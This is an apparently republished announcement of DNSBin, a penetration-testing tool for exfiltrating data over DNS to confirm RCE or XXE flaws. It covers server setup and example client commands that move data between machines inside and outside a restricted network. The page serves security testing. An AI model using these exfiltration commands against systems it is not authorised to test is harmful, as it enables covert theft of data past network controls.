DNSBin - Tool To Test Data Exfiltration Through DNS (RCE and XXE)

Новости информационной безопасности

DNSBin - Tool To Test Data Exfiltration Through DNS (RCE and XXE)


DNSBin is a simple tool to test data exfiltration through DNS and help test vulnerability like RCE or XXE when the environment has significant constraint. The project is in two parts, the first one is the web server and it's component. It offers a basic web UI, for most cases you won't need more than this. The client part offers a python script which allows data to be transfered in both direction through DNS using the web service.


Setup and installation


The current DNS setup that I have for the demo server is the following one. Do note that I did this with trial and error, so the setup may be overcomplicated or may have issues. If you are more knowledgeable feel free to open an issue.

Web Hosting
It's highly recommended to start the DNS receiver and WebSocket endpoint with the Node.JS module "forever".
forever start index.js
For the frontend, the file "index.html" can be hosted on the webserver of your choice. Make sure that the WebSocket URL points to your server.

The client script requires "dnspython" to be installed on both end. Whether you are sending or receiving data, you must first start the script on the machine that's outside of the restricted zone. The script will provide you with a unique token that you must pass when running the script on the machine that's inside of the restricted zone.

Example sending data
Outside machine

echo test12345 | python main.py -f- -d out -t-
Inside machine
python main.py -f- -d in -t TOKEN_THE_FIRST_COMMAND_GAVE_YOU

Example receiving data
Outside machine
python main.py -f- -d in -t-
Inside machine
echo test12345 | python main.py -f- -d out -t TOKEN_THE_FIRST_COMMAND_GAVE_YOU

Дата: 2018-05-16 14:37:57

Источник: https://www.kitploit.com/2018/05/dnsbin-tool-to-test-data-exfiltration.html

dns,dnsbin,exfiltration,linux,node.js,python,rce,security tools,server,vulnerability,webserver,websocket,xxe